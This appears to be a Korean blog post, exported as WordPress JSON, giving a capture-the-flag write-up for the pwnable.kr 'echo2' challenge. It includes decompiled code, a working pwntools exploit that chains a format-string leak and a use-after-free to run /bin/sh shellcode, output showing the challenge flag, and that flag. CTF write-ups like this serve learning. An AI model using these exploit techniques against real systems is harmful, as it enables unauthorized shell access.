{"id":2554,"date":"2024-05-25T06:28:50","date_gmt":"2024-05-24T21:28:50","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2554"},"modified":"2024-05-25T06:28:51","modified_gmt":"2024-05-24T21:28:51","slug":"echo2","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2554","title":{"rendered":"echo2"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Description<\/h2>\n\n\n\n<p>Pwn this echo service.<\/p>\n\n\n\n<p>download : http:\/\/pwnable.kr\/bin\/echo2<\/p>\n\n\n\n<p>Running at : nc pwnable.kr 9011<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">checksec <\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@wh1te4ever-main:~\/Desktop\/pwnable.kr-CTF\/echo2$ checksec .\/echo2\n[*] '\/home\/ubuntu\/Desktop\/pwnable.kr-CTF\/echo2\/echo2'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX disabled\n    PIE:      No PIE (0x400000)\n    RWX:      Has RWX segments<\/pre>\n<\/div><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _QWORD *v3; \/\/ rax\n  unsigned int i; \/\/ [rsp+Ch] [rbp-24h] BYREF\n  __int64 v6[4]; \/\/ [rsp+10h] [rbp-20h] BYREF\n\n  
setvbuf(stdout, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  o = malloc(0x28uLL);\n  *((_QWORD *)o + 3) = greetings;\n  *((_QWORD *)o + 4) = byebye;\n  printf(\"hey, what's your name? : \");\n  __isoc99_scanf(\"%24s\", v6);\n  v3 = o;\n  *(_QWORD *)o = v6[0];\n  v3[1] = v6[1];\n  v3[2] = v6[2];\n  id = v6[0];\n  getchar();\n  func[0] = (__int64)echo1;\n  qword_602088 = (__int64)echo2;\n  qword_602090 = (__int64)echo3;\n  for ( i = 0; i != 121; i = getchar() )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        puts(\"\\n- select echo type -\");\n        puts(\"- 1. : BOF echo\");\n        puts(\"- 2. : FSB echo\");\n        puts(\"- 3. : UAF echo\");\n        puts(\"- 4. : exit\");\n        printf(\"> \");\n        __isoc99_scanf(\"%d\", &amp;i);\n        getchar();\n        if ( i > 3 )\n          break;\n        ((void (*)(void))func[i - 1])();\n      }\n      if ( i == 4 )\n        break;\n      puts(\"invalid menu\");\n    }\n    cleanup();\n    printf(\"Are you sure you want to exit? 
(y\/n)\");\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">echo1<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int echo1()\n{\n  return puts(\"not supported\");\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">echo2<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 echo2()\n{\n  char format[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  get_input(format, 32LL);\n  printf(format);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">echo3<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 echo3()\n{\n  char *s; \/\/ [rsp+8h] [rbp-8h]\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  s = (char *)malloc(32uLL);\n  get_input(s, 32LL);\n  puts(s);\n  free(s);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 
class=\"wp-block-heading\">cleanup<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void cleanup()\n{\n  free(o);\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>1. main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc5d0 \uc258\ucf54\ub4dc \uc0bd\uc785<\/p>\n\n\n\n<p>2. echo2 \ud568\uc218\ub97c \ud1b5\ud574 \uc2a4\ud0dd \uc8fc\uc18c\ub97c leak\ud558\uc5ec main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12 \ud68d\ub4dd<\/p>\n\n\n\n<p>3. (\uc5ec\uae30\uc11c\ubd80\ud130 UAF trigger \uc2dc\uc791) cleanup \ud568\uc218\ub97c \ud1b5\ud574 main \ud568\uc218\uc758 o \ubcc0\uc218\ub97c free<\/p>\n\n\n\n<p>4. echo3 \ud568\uc218\ub97c \ud1b5\ud574 o \ubcc0\uc218\uc5d0 \uc788\ub358 \uba54\ubaa8\ub9ac \uc8fc\uc18c\ub97c \ub2e4\uc2dc\ud55c\ubc88 \ub354 use\ud558\uc5ec, <br>greetings \ud568\uc218\uc8fc\uc18c\uac00 \uc801\ud78c \uc8fc\uc18c\uc5d0\ub2e4\uac00 \uc544\uae4c leak\ud558\uc5ec \ud68d\ub4dd\ud588\ub358 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12\uc73c\ub85c \ub36e\uc5b4\uc4f4\ub2e4.<\/p>\n\n\n\n<p>5. 
\uc774\uc81c greetings \ud568\uc218\ub294 \ub354\uc774\uc0c1 \ud638\ucd9c\ub418\uc9c0 \uc54a\uace0 \uc258\ucf54\ub4dc\uac00 \uc2e4\ud589\ub41c\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = remote(\"pwnable.kr\", 9011)\n#p = process(\".\/echo2\")\ne = ELF('.\/echo2', checksec=False)\n\n# https:\/\/systemoverlord.com\/2016\/04\/27\/even-shorter-shellcode.html\nshellcode = b'\\x31\\xF6\\x56\\x48\\xBB\\x2F\\x62\\x69\\x6E\\x2F\\x2F\\x73\\x68\\x53\\x54\\x5F\\xF7\\xEE\\xB0\\x3B\\x0F\\x05'\np.sendlineafter(b\"hey, what's your name? 
: \", shellcode)\n\np.sendlineafter(b\"> \", b\"2\")\np.sendline(b'%9$p')\np.recvline()\nleaked_stack = p.recvline().split(b'\\n')[0]\nleaked_stack = int(leaked_stack, 16)\nsuccess(f\"leaked_stack: {hex(leaked_stack)}\")\n\np.sendline(b\"4\")\np.sendline(b\"n\")\n\np.sendlineafter(b\"> \", b\"3\")\np.sendline(b'C'*24 + p64(leaked_stack - 0x20))\n\np.interactive()<\/pre>\n<\/div><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@wh1te4ever-main:~\/Desktop\/pwnable.kr-CTF\/echo2$ python3 solve.py\n[+] Opening connection to pwnable.kr on port 9011: Done\n[+] leaked_stack: 0x7ffd8af398f0\n[*] Switching to interactive mode\nAre you sure you want to exit? (y\/n)\n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> hello \nCCCCCCCCCCCCCCCCCCCCCCCC\u0418\\xf3\\x8a\\xfd\ngoodbye \n\n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> $ ls\necho2\nflag\nlog\nsuper.pl\n$ cat flag\nfun_with_UAF_and_FSB :)\n$ \n[*] Interrupted\n[*] Closed connection to pwnable.kr port 9011<\/pre>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Description Pwn this echo service. download : http:\/\/pwnable.kr\/bin\/echo2 Running at : nc pwnable.kr 9011 checksec Decompiled-src main echo1 echo2 echo3 cleanup Solution 1. main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc5d0 \uc258\ucf54\ub4dc \uc0bd\uc785 2. echo2 \ud568\uc218\ub97c \ud1b5\ud574 \uc2a4\ud0dd \uc8fc\uc18c\ub97c leak\ud558\uc5ec main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12 \ud68d\ub4dd 3. 
(\uc5ec\uae30\uc11c\ubd80\ud130 UAF trigger \uc2dc\uc791) cleanup \ud568\uc218\ub97c \ud1b5\ud574 main \ud568\uc218\uc758 o \ubcc0\uc218\ub97c free&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=2554\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">echo2<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[32,35,25,45],"class_list":["post-2554","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-format-string-bug","tag-heap","tag-pwnable","tag-uaf"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2554"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions"}],"predecessor-version":[{"id":2555,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions\/2555"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2554"},{"taxonomy":"post_tag","embeddable":true,"href":"htt
ps:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}